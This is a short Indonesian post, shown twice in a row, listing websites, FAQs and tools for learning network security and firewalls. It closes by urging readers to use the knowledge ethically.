Oke, To The Point Saja Ya :)
Berbagai teknik jaringan internet dapat di peroleh secara mudah di Internet antara lain di http://www.sans.org, http://www.rootshell.com, http://www.linuxfirewall.org/. Sebagian dari teknik ini berupa buku-buku yang jumlah-nya beberapa ratus halaman yang dapat di ambil secara cuma-cuma (FREE). Beberapa Frequently Asked Question (FAQ) tentang keamanan jaringan bisa diperoleh di http://www.iss.net/vd/mail.html, http://www.v-one.com/documents/fw-faq.htm. Dan bagi cara experimenter beberapa script / program yang sudah jadi dapat diperoleh antara lain di http://bastille-linux.sourceforge.net/, http://www.redhat.com/support/docs/tips/firewall/firewallservice.html.
Cara paling sederhana untuk melihat kelemahan sistem adalah dengan cara mencari informasi dari berbagai vendor misalnya di http://www.sans.org/newlook/publications/roadmap.htm#3b tentang kelemahan dari sistem yang mereka buat sendiri. Di samping, memonitoring berbagai mailing list di Internet yang berkatain dengan keamanan jaringan seperti dalam daftar http://www.sans.org/newlook/publications/roadmap.htm#3e.
Saya berharap ilmu keamanan jaringan di tulisan ini di gunakan untuk hal-hal yang baik. Jadilah seorang Hacker bukan Cracker!!
Oke, To The Point Saja Ya :)
Berbagai teknik jaringan internet dapat di peroleh secara mudah di Internet antara lain di http://www.sans.org, http://www.rootshell.com, http://www.linuxfirewall.org/. Sebagian dari teknik ini berupa buku-buku yang jumlah-nya beberapa ratus halaman yang dapat di ambil secara cuma-cuma (FREE). Beberapa Frequently Asked Question (FAQ) tentang keamanan jaringan bisa diperoleh di http://www.iss.net/vd/mail.html, http://www.v-one.com/documents/fw-faq.htm. Dan bagi cara experimenter beberapa script / program yang sudah jadi dapat diperoleh antara lain di http://bastille-linux.sourceforge.net/, http://www.redhat.com/support/docs/tips/firewall/firewallservice.html.
Cara paling sederhana untuk melihat kelemahan sistem adalah dengan cara mencari informasi dari berbagai vendor misalnya di http://www.sans.org/newlook/publications/roadmap.htm#3b tentang kelemahan dari sistem yang mereka buat sendiri. Di samping, memonitoring berbagai mailing list di Internet yang berkatain dengan keamanan jaringan seperti dalam daftar http://www.sans.org/newlook/publications/roadmap.htm#3e.
Saya berharap ilmu keamanan jaringan di tulisan ini di gunakan untuk hal-hal yang baik. Jadilah seorang Hacker bukan Cracker!!
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